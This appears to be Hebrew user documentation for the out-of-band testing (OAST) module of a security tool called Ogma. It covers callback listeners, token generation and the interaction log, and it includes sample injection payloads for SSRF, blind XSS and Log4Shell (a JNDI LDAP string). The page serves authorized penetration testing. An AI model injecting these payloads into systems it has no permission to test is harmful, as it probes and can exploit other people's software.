OAST
OAST (בדיקות אבטחת יישומים מחוץ לערוץ) מזהה חולשות שאינן יוצרות תגובה גלויה; במקום זאת, היעד יוצר חיבור יוצא למאזין שבשליטתכם, ובכך מאשר את הבעיה.
איך זה עובד
Ogma מפעיל מאזינים מקומיים למספר פרוטוקולים. כאשר יישום היעד פונה לאחד המאזינים האלה, האינטראקציה מתועדת עם כתובת ה-IP של המקור, חותמת הזמן, הנתונים שהתקבלו והאסימון שהוזרק.
פרוטוקולי המאזין
| פרוטוקול | פורט ברירת מחדל | שימוש |
|---|---|---|
| HTTP | ניתן להגדרה | SSRF, XSS עיוור, וובהוקים |
| HTTPS | ניתן להגדרה | SSRF דרך TLS |
| DNS | ניתן להגדרה | הזרקה עיוורת, XXE, log4shell |
| SMTP | ניתן להגדרה | הזרקת כותרות דוא״ל, SSRF לשירותי דואר |
הגדירו את פורטי המאזין ואת שם הדומיין המשמש באסימונים שנוצרים בחלונית ההגדרות של OAST.
יצירת אסימון לקריאה חוזרת
- פתחו את כלי עזר > OAST.
- לחצו על יצירת אסימון. כל אסימון ייחודי לבדיקה שלו.
- העתיקו את האסימון. הוא כולל את דומיין המאזין ומזהה ייחודי, כך שאפשר לשייך אינטראקציות בחזרה לבדיקה המסוימת.
דוגמה לפורמט אסימון: [unique-id].[your-oast-domain]
שימוש באסימונים במטענים
הזריקו את אסימון הקריאה החוזרת לכל שדה שבו היישום עשוי ליצור חיבור יוצא:
- SSRF: השתמשו באסימון HTTP/HTTPS בתור כתובת ה-URL של היעד:
https://[token]/ - XXE: הפנו לאסימון ב-DOCTYPE או בכתובת URL של ישות חיצונית.
- Log4Shell: שלבו אותו בכותרת:
${jndi:ldap://[token]/a} - XSS עיוור: הזריקו אותו כ-src של סקריפט:
<script src="https://[token]/x.js"></script> - הזרקת SMTP: השתמשו בו ככתובת יעד או כ-URL בכותרות דוא״ל.
יומן אינטראקציות
חלונית האינטראקציות מציגה כל קריאה חוזרת שהתקבלה:
| עמודה | תיאור |
|---|---|
| זמן | מועד קבלת האינטראקציה |
| פרוטוקול | HTTP, HTTPS, DNS או SMTP |
| IP מקור | כתובת ה-IP שיצרה את החיבור |
| אסימון | האסימון שאליו בוצעה הפנייה |
| נתונים | נתיב הבקשה, שם שאילתת DNS או נתוני SMTP |
לחצו על שורה כלשהי כדי לראות את פרטי האינטראקציה המלאים, כולל כותרות הבקשה והגוף, כאשר הם רלוונטיים.
התאמת אינטראקציות לבדיקות
מכיוון שכל אסימון ייחודי, אפשר להזריק אסימונים שונים לפרמטרים או לבקשות שונים ולקבוע בדיוק איזו נקודת הזרקה הפעילה את הקריאה החוזרת.